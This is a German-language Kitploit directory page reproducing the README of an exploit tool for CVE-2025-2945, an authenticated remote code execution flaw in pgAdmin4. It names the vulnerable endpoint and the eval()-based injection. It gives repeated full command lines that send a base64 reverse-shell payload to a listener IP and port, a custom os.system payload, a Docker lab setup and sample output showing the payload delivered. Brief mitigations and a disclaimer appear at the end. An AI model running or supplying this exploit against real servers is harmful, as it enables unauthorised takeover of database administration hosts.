Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2945 — Exploit für die Remote Code Execution (RCE)-Sicherheitslücke in pgAdmin4, die die Versionen 8.10 bis 9.1 betrifft. | Kitploit
Tools/GitHubGitHub/g0d150ne/cve-2025-2945
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Exploit für die Remote Code Execution (RCE)-Sicherheitslücke in pgAdmin4, die die Versionen 8.10 bis 9.1 betrifft.

Repository anzeigen
4vor 29 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2945 - pgAdmin4-Exploit für authentifizierte RCE

Autor: G0D150NE Version: 2.0.0
CVE: CVE-2025-2945
Schweregrad: Kritisch (CVSS 9.9)

📌 Beschreibung

Exploit für die Remote Code Execution (RCE)-Schwachstelle in pgAdmin4, die die Versionen 8.10 bis 9.1 betrifft.

Die Schwachstelle existiert im Endpunkt /sqleditor/query_tool/download, an dem der Parameter query_commited unbereinigt an Pythons eval()-Funktion übergeben wird, was die Ausführung beliebigen Codes ermöglicht.

⚡ Funktionen

  • ✅ Automatische Versionserkennung
  • ✅ CSRF-Token-Sammlung aus mehreren Quellen
  • ✅ Enumeration von Server-/Gruppen-IDs
  • ✅ Reverse-Shell-Payload (base64-kodiert)
  • ✅ Unterstützung für benutzerdefinierte Payloads
  • ✅ Ausführlicher Debug-Modus
  • ✅ Farbige Konsolenausgabe
  • ✅ Umgehung der SSL-Verifizierung

🚀 Installation

root@kitploit:~
# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Install dependencies
pip install requests

🎯 Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

Mit ausführlicher Ausgabe

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Benutzerdefinierte Payload

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Versionsprüfung überspringen

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Argumente

Argument Erforderlich Beschreibung --target-url Ja Basis-URL von pgAdmin4 (http://RHOST:PORT/) --username Ja pgAdmin4-Anmelde-E-Mail --password Ja pgAdmin4-Anmeldekennwort --db-user Ja Datenbank-Benutzername --db-pass Ja Datenbank-Passwort --db-name Ja Datenbankname --Rhost Ja Listener-IP für die Reverse Shell --Rport Ja Listener-Port für die Reverse Shell --max-server-id Nein Maximale zu scannende Server-ID (Standard: 10) --skip-version-check Nein Versionsprüfung überspringen --custom-payload Nein Benutzerdefinierter Python-Payload --verbose, -v Nein Debug-Ausgabe aktivieren --no-banner Nein Banner ausblenden

📋 Anforderungen

· Python 3.6+ · requests-Bibliothek

root@kitploit:~
pip install requests

🧪 Testumgebung

root@kitploit:~
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Beispielausgabe

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Gegenmaßnahmen

· Aktualisieren Sie pgAdmin4 auf Version 9.2 oder höher · Beschränken Sie den Zugriff auf die pgAdmin-Oberfläche · Verwenden Sie starke Anmeldedaten · Aktivieren Sie MFA, falls verfügbar

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests und Bildungszwecken. Die Verwendung gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch.

🔗 Referenzen

· CVE-2025-2945 · pgAdmin-Sicherheitshinweis

📄 Lizenz

MIT-Lizenz

Tool herunterladen